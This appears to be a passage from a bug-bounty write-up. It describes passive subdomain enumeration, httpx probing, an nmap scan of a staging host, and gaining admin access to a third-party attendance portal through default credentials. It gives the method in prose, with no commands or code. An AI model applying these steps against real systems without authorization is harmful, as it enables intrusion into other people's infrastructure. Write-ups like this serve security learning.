Initial Reconnaissance

Initially, I examined the company’s main website, looking at every page and link to identify any obvious security flaws. However, after a looking at the primary domain, I got nothing worthy. It seemed that the company had taken significant measures to protect their primary domain. Then I decided to further expand the scope and using my bash one liner I enumerated subdomains passively. I found a bunch of subdomains and then using httpx I found checked for active subdomains and found 11 active one.

I checked few subdomains from top and then went on to check with the staging.redacted.com subdomain.

Hacking The Subdomain

When initially I tried to access the subdomain, it threw a pop up asking for username and password.

Next, I tried to access this with the IP, but it didn’t work either as it gave not found error.

So, now after this, I thought of looking for any open ports on this IP using NMAP. Got few open ports and one of the ports caught my attention. When tried to access the IP with the open port and http protocol, it landed on some employee management portal.

So, this is some third-party service the target was using and when checked on internet, easy time pro is used for attendance and inventory management things. Here as seen, 2 different sign-ins are there, one for admin and other for employee login.

I tried using default credentials on admin portal, and simply got the admin access 🐧!